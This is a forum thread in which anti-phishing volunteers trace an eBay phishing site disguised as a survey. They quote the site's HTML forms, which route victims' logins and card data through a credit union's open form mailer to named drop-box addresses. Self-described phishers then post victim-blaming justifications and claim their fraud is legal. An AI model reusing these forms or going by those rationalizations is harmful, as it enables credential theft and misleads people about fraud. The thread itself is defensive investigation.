site Search:


 
    All Forums Hot Topics Gallery






how-to block ads


 
Search Topic:
Uniqs:
5228
Share Topic
Posting?
Post a:
Post a:
Links: ·Phish Tracker ·Anti-Phishing Work Group ·Avoid Phishing
page: 1 · 2
AuthorAll Replies


SYNACK
Just Firewall It
Premium,Mod
join:2001-03-05
Venice, CA
Host:
Networking
Virtual Private Ne..
Netgear
ZyXEL

[Phishing] E-bay phish disguised as survey




Link actually goes to: http://0x573471f6.boanxx16.adsl-dhcp.tele.dk/survey/ebay0605/

After filling out an "innocent" survey, it'll take until page 3 until they request e-bay account and CC information, promising some perks.


amysheehan
Premium,VIP,MVM
join:1999-12-21
Huntington Beach, CA
kudos:9
Reviews:
·RoadRunner Cable

Could you submit the email to the »/phishtrack ????

Thanks-
amy


--
DSLR Phishtracker



E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

reply to SYNACK
Looks like they have a paypal site as well:
»0x573471f6.boanxx16.adsl-dhcp.te···/webscr/
»0x573471f6.boanxx16.adsl-dhcp.te···ify-run/



SYNACK
Just Firewall It
Premium,Mod
join:2001-03-05
Venice, CA
Host:
Networking
Virtual Private Ne..
Netgear
ZyXEL

reply to amysheehan

said by amysheehan:

Could you submit the email to the »/phishtrack ????
Done: »/phishtrack?pi···4&urls=1


E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

Might as well get a jump - sent:
abuse@post.tele.dk
staff@ip.tele.dk
spoof/ebay/paypal


MGD
Premium,MVM
join:2002-07-31
kudos:9

4 edits

reply to SYNACK

Credit Union Helps Romanian phishers collect victim's card data

The results of some of my digging on this phish now assigned number 3874 on phishtrack made me fall off my bar stool. So,..someone.. please recheck my homework, as this is almost unbelievable.

These Romanian phishers are actually using an open form mailer belonging to the Credit Union National Association (CUNA) www.creditunion.coop/ to mail the victim's data to their drop boxes. This Ebay phish on IP 87.52.113.246 in Denmark, sends the data collected here:
Ebay User ID

Ebay phish user id
and the card data here:

Ebay phish card entry
via the CUNA Credit Union's very own formailer: ht*tp://www.creditunion.coop/cgi-php/formtomail.php to the Romanian criminal's drop boxes at rudele@gmail.com and zuzzi@tycobb.net. They use Subject value = "Dandanaua"


<FORM name="main" method="post" action="http://www.creditunion.coop/cgi-php/formtomail.php">

<input type="hidden" name="from" value="rudele@gmail.com">

<input type="hidden" name="to" value="zuzzi@tycobb.net">

<input type="hidden" name="subject" value="Dandanaua">
<input type="hidden" name="nexturl" value="http://0x573471f6.boanxx16.adsl-dhcp.tele.dk/survey/ebay0605/done.html">

Ohhh wait..It gets even worse !!! While running the drop boxes through Google we find that CUNA www.creditunion.coop were themselves Phished by the same criminals a week ago on 08/24 from a hijacked road runner machine, again using their very own form mailer. Though I found and noted it at the time, its significance escaped me.

Not to add to the dismal irony here, but the Credit Union National Association's home page actually contains a prominent warning about being alert for phishing:


Maybe we can get this issue some front page attention so that they can be CLUED in to what is going on right under their noses.

I wonder if CUNA's form mailer keeps a copy of the mail, could they already have a list of their own and Ebay's phish victims??.

I assume the Paypal phish on the same machine that E_V See Profile pointed out may use the same same process:

PayPal phish same location
I would test it, but according to that source code the user ID and password is validated in real time with Paypal, and I do not have a spare valid credential to check it out with !!.

For the record, I posted the entire source code from the Ebay page in the 3874 phish comments.

MGD
Edit=added missing text


E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

1 edit

Re: Credit Union Helps Romanian phishers collect victim's card d

said by MGD:

I would test it, but according to that source code the user ID and password is validated in real time with Paypal
Tried a few times
'Ran into problems sending Mail. Response: 535 auth failure'
add url:
»0x573471f6.boanxx16.adsl-dhcp.te···rify.php

MGD
Premium,MVM
join:2002-07-31
kudos:9

reply to SYNACK

Add another one to the list

nwrickert See Profile just submitted an Ebay Phish 4034 »/phishtrack?pi···4&urls=1 that was just added to the /bshow/ directory on the same Danish machine.
ht*tp://0x573471f6.boanxx16.adsl-dhcp.tele.dk/bshow/coPartnerSiteId/eb.html

Ebay Phish


And as usual the victim's data is sent to the phishers drop boxes courtesy of Credit Union National Association's (CUNA)ht*tp://www.creditunion.coop/cgi-php/formtomail.php form mailer. In this case the email addresses used are: rudele-din-state@gmail.com and zuzzicutz@yahoo.com


<td width="310" height="23" nowrap><b>Verify your eBay User and Password</b></td>

<form method="post" name="SignInForm" onsubmit="setOptimCookie();" action="http://www.creditunion.coop/cgi-php/formtomail.php">
<input type="hidden" name="from" value="rudele-din-state@gmail.com">

<input type="hidden" name="to" value="zuzzicutz@yahoo.com">

<input type="hidden" name="subject" value="User">
<input type="hidden" name="nexturl" value="http://0x573471f6.boanxx16.adsl-dhcp.tele.dk/bshow/coPartnerSiteId/update.html">

So far we have collected 5 drop boxes of the Romo scammers.

masa@gmail.com

zuzzi@tycobb.net

rudele@gmail.com

rudele-din-state@gmail.com

zuzzicutz@yahoo.com

MGD


pcdebb
RIP dadkins
Premium
join:2000-12-03
Brandon, FL
kudos:4

reply to SYNACK

Re: [Phishing] E-bay phish disguised as survey

OMG, someone in that IT department doesnt deserve a pink slip, they deserve a RED SLIP!!!! shouldnt something liek this show up in their logs or something?
--
babbling | How's the weather?


Zuzzi

@aol.com

reply to MGD

Re: Credit Union Helps Romanian phishers collect victim's card d

Hey, guyz.

Funny, huh?

I`m not a "criminals", as u named me, i`m a regular girl, it happens in this case that i`m not even a boy ..., and i`m not so bad ..., i`m doing it because i need to, u come and live where i live and u`ll see that u`ll do the same.

In fact, nobody`s a criminal, is just that the americans, although are instructed how to detect scam and not to respond to it, they do it. It`s because they wanna do it, they simplly don`t care about their money! Nobody is making them give us money, we don`t put a gun upon them, it`s their choice. Who cares about what he has, is deleting the e-mail, who doesn`t, he give what we ask, what`s your problem?! IT`S THEIR CHOICE.Everybody knows about scam in US, if they don`t wanna open theier eyes is just their fu**ing problem, not yours! The true websites tells them how to beat scam, they don`t wanna beat it, so leave them alone and mind your own life, just delete the e`mail and that`s it, because i suppose u must have a family, a job, some hobbies, although u look lifeless...!

The NCUA is not helping anybody doing this, but the fact is that every server has vulnerabilities that can be exploited, even www.ebay.com, that costs some millions ..., it`s a metter of how bored u are so u can discover it, if u really want this!

U shouldn`t be so scared, because we don`t use all that cards in the end, just some of them . You panic for $10? In my country, some of us are lucky enough to have a job and work a month for $100-$200, how`s that sounds to u? And we never panic for nothing, and nobody looses his life on this stupid forum!

U may say what ever u like, u may report what ever u like, the thing stays the same.

And btw, about that 5 boxes, just the one from yahoo and the one from tycobb exists, u can try it, i`ll respond, clever guys! U can`t even read a simple code, but u wanna beat scam ...! Cool life u must have, at least from time to time we get some money from staying at the computer, but what about u?Do you get paid for reporting? Do u think u help them? Everyday of my life tells me that u don`t help nobody, we still can eat and pay the rent and school taxes doing this!

I wish u all the best, and sorry for the ones who experienced online fraud in the past, but IT`S JUST YOUR FAULT, STOP PLAYING A VICTIM, WE ARE THE VICTIMS OF THE STUPIDNESS OF SOME OF U, THAT PUT US IN THE RISCK TO GO TO JAIL, MAY BE WE COULD FOUND OTHER WAY OF LIVING IF WE DIDN`T KNOW THAT AMERICANS ARE STUPID.


E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

LOL



Snowy
mIRC unix.ro UnderNet
Premium
join:2003-04-05
Kailua, HI
kudos:5

reply to Zuzzi
Maybe we can put a face on the smell
»utime.uv.ro/


Jon_Hanson
Mountain Dew Rules
Premium
join:2001-07-09
Gilbert, AZ

reply to Zuzzi

said by Zuzzi :

Hey, guyz.

Funny, huh?

I`m not a "criminals", as u named me, i`m a regular girl, it happens in this case that i`m not even a boy ..., and i`m not so bad ..., i`m doing it because i need to, u come and live where i live and u`ll see that u`ll do the same.

In fact, nobody`s a criminal, is just that the americans, although are instructed how to detect scam and not to respond to it, they do it. It`s because they wanna do it, they simplly don`t care about their money! Nobody is making them give us money, we don`t put a gun upon them, it`s their choice. Who cares about what he has, is deleting the e-mail, who doesn`t, he give what we ask, what`s your problem?! IT`S THEIR CHOICE.Everybody knows about scam in US, if they don`t wanna open theier eyes is just their fu**ing problem, not yours! The true websites tells them how to beat scam, they don`t wanna beat it, so leave them alone and mind your own life, just delete the e`mail and that`s it, because i suppose u must have a family, a job, some hobbies, although u look lifeless...!

The NCUA is not helping anybody doing this, but the fact is that every server has vulnerabilities that can be exploited, even www.ebay.com, that costs some millions ..., it`s a metter of how bored u are so u can discover it, if u really want this!

U shouldn`t be so scared, because we don`t use all that cards in the end, just some of them . You panic for $10? In my country, some of us are lucky enough to have a job and work a month for $100-$200, how`s that sounds to u? And we never panic for nothing, and nobody looses his life on this stupid forum!

U may say what ever u like, u may report what ever u like, the thing stays the same.

And btw, about that 5 boxes, just the one from yahoo and the one from tycobb exists, u can try it, i`ll respond, clever guys! U can`t even read a simple code, but u wanna beat scam ...! Cool life u must have, at least from time to time we get some money from staying at the computer, but what about u?Do you get paid for reporting? Do u think u help them? Everyday of my life tells me that u don`t help nobody, we still can eat and pay the rent and school taxes doing this!

I wish u all the best, and sorry for the ones who experienced online fraud in the past, but IT`S JUST YOUR FAULT, STOP PLAYING A VICTIM, WE ARE THE VICTIMS OF THE STUPIDNESS OF SOME OF U, THAT PUT US IN THE RISCK TO GO TO JAIL, MAY BE WE COULD FOUND OTHER WAY OF LIVING IF WE DIDN`T KNOW THAT AMERICANS ARE STUPID.
It's people like you that make all of us sick. You think you have the right to rip people off because of the conditions in your country? That's a good justification . If you really have skills and aren't just a "script kiddie" you should put your talent to work for good instead of fraud. How do you sleep at night knowing that you're stealing from people? You must have no conscience.

When you take something (especially money) from someone by false and fradulent means it is criminal in Romania or the United States. It's only a matter or time before you're caught and you've already lost your anonimity in this forum and our posts regularly show up high in the rankings in Google searches.

It's not that people are "stupid" it's that they don't realize that criminals like you can make an e-mail and a website look like their bank or whatever to give their information to. People will become educated or it will become impossible to make a website or e-mail look like something it's not and you'll be out of business.

I'm guessing you're more of the "script kiddie" variety (you take some tools that someone else made and don't really do any work of your own) because the people here have been able to easily take apart your work.

Have fun looking over your shoulder the rest of your life wondering when things will catch up to you.

scott1527
Premium
join:2003-01-19

reply to SYNACK

Re: [Phishing] E-bay phish disguised as survey

yes. script kiddie.

how much do you pay for your prebuilt packages ?

and do you actually exploit machines or do you get somone even scummier to do this for you.


Dumi

@aol.com

Man, it`s stealing when i hit u, when i use a gun or a knife to take ur money, and so on, not this. And stop telling about my country, and criminals and so on, because there are a lot of situations, when americans help the "criminals" transfer money from a certain bank account, and not only this ...!You`re not so good people, it`s just that u don`t need to do it.

"It's not that people are "stupid" it's that they don't realize that criminals like you can make an e-mail and a website look like their bank or whatever to give their information to." It`s ok not to realize, np, but, when we talk about money, you should be interesed in what u have, and you should read the entire website of your financial service, this is what a normal person would have done! Everybody have credit or debit cards, but not all of us are so "on another planet", like the one you defend. That guys don`t give a fuck about nothing, they stay at the computer looking for sex orientated websites (i have a lot of e-mail addresses full with that kind of e-mails, it seams hard to get a life in US), and just do their job alone wating for god to protect them from spammers. You are so pathetic! And in the end, they call us criminals. If i would have used a knife, i would feel quilty, but now i don`t, as long as they can read, it seams they are donating money over the internet, and that`s all!

Get caught for what?!:)). Are we allowed to have your financial information? As long as you are adult people that give it to us without any kind of violence, we are allowd to have it and use it, if we want and id we can.

The truth is that you don`t help them, the real helpers are the financial institiutios they belong to, the software developers, the filters they create, microsoft, and so on, they create toolbars and all kind of shit helping stupid people, unable to read the security issues of their financial institution, not to get broke. Your forum doesn`t help your community. You re just a bunch of lifeless people who got their way to feel proud of themselfs.

You better start preocupating for your own life and find yourself another hobby. You can`t know when will your life ends, it`s a pitty lose it doing things that you don`t get rewarded for. I think your wife would reward you more for a sweet kiss, that for staying at the computer and hunting spammers. And u`ll be more happy .

About my identity ... i could tell you, because i can`t go to jail if all i do is spamming, this is the law. The law will send me to jail only if i falsificate your cards and use it in ATM, wich personally i don`t do, but for making lifeless people spend time on a forum and talk about my scams, nobody will send me to jail.
It`s like summer wine .



djtim21
It's all good
Premium
join:2003-12-22
Lake Villa, IL
Reviews:
·Comcast

This is the way I see it, you keep playing your game, We'll play ours, and I bet we win.

Don't forget it only takes one mistake for us to find you.
--
"All that is necessary for the triumph of evil is that good men do nothing.” - Edmund Burke



E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

They have no idea who reads this forum.



Dumi

@aol.com

It`s not quite a problem if u find us, the law is the law, don`t metter if u like it or not. They don`t judge according to your feelings. As long as we don`t pass it, it`s ok .

Oh, btw, i found another big server to deliver my e-mails in the future, cause i`m quite bored this days, no need to work ...uhhh . U just keep searching, and if u`ll find u`ll get a big burger .



E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

said by Dumi :

Oh, btw, i found another big server to deliver my e-mails in the future, cause i`m quite bored this days, no need to work ...uhhh .
Keep us posted


djtim21
It's all good
Premium
join:2003-12-22
Lake Villa, IL
Reviews:
·Comcast

reply to Dumi
Well there are always servers out there, small and large that can be compromised.

The obvious question on everyone's mind is how long do you think you can run before we find you again?

I had a previous job of repossessing cars for about 2 years. We always had the understanding that alarm systems were never put into place to stop someone from stealing a car, it's just to slow them down so they get caught.

Personally I don't think your that good. People had you shut down before you could even harvest any relevant information.

Again - I say play your game because our game just gets better with time.
--
"All that is necessary for the triumph of evil is that good men do nothing.” - Edmund Burke


Monday, 28-May 08:07:01 Terms of Use & Privacy | feedback | contact | Hosting by nac.net - DSL,Hosting & Co-lo
over 12.5 years online © 1999-2012 dslreports.com.
Most commented news this week
Hot Topics